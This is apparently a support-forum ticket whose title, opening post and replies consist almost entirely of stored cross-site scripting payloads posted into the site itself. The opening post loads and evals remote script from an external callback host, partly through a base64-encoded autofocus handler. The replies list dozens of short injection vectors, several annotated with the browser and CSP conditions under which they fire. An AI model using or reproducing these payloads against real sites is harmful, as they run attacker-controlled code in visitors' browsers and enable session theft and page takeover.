A'””>”>'”>’>”>”>

#80825
  • A'””><script src=https://akt.xss.ht></script>”>‘”>’>”><script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener(“load”, b);a.open(“GET”, “//akt.xss.ht”);a.send();</script><script>$.getScript(“//akt.xss.ht”)</script>”><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYWt0Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= autofocus>

Viewing 6 replies - 1 through 6 (of 6 total)
  • <object/data=javascript:alert()>
    <a/href=”javascript%0A%0D:alert()”>

    <svg onload=”a=domain,b=confirm,c=window,c.onerror=b;throw a”>aa

    • This reply was modified 4 years, 2 months ago by A'"">">'">'>">">. Reason: A'"">">'">'>">">

    void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script>” />data:text/html,<script>void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script> ‘”>>data:text/html,<script>void”??globalThis?.alert?.(…[0b1_0_1_0_0_1_1_1_0_0_1,],)</script>

    <!– If you control the name, will work on Firefox in any context, will fail in chromium in DOM –>
    <svg/onload=eval(name)>

    <!– If you control the URL, Safari-only –>
    <iframe/onload=write(URL)>

    <!– If you control the URL –>
    <svg/onload=eval('+URL)>

    <!– If you control the name, but unsafe-eval not enabled –>
    <svg/onload=location=name>

    <!– Just a casual script –>
    <script/src=//NJ.₨></script>

    <!– If you control the name of the window –>
    <iframe/onload=src=top.name>

    <!– If you control the URL –>
    <iframe/onload=eval(‘`’+URL)>

    <!– If number of iframes on the page is constant –>
    <iframe/onload=src=top[0].name+/\NJ.₨?/>

    <!– for Firefox only –>
    <iframe/srcdoc=”<svg><script/href=//NJ.₨ />”>

    <!– If number of iframes on the page is random –>
    <iframe/onload=src=contentWindow.name+/\NJ.₨?/>

    <!– If unsafe-inline is disabled in CSP and external scripts allowed –>
    <iframe/srcdoc=”<script/src=//NJ.₨></script>”>

    <!– If inline styles are allowed –>
    <style/onload=eval(name)>

    <!– If inline styles are allowed, Safari only –>
    <style/onload=write(URL)>

    <!– If inline styles are allowed and the URL can be controlled –>
    <style/onload=eval('+URL)>

    <!– If inline styles are blocked –>
    <style/onerror=eval(name)>

    <!– Uses external script as import, doesn’t work in innerHTML unless Firefox –>
    <!– The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header –>
    <svg/onload=import(/\\NJ.₨/)>

    <!– Uses external script as import, triggers if inline styles are allowed. –>
    <!– The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header –>
    <style/onload=import(/\\NJ.₨/)>

    <!– Uses external script as import –>
    <!– The PoC only works on https and Chrome, because NJ.₨ checks for Sec-Fetch-Dest header –>
    <iframe/onload=import(/\\NJ.₨/)>

The ticket ‘A'””>”>'”>’>”>”>’ is closed to new replies.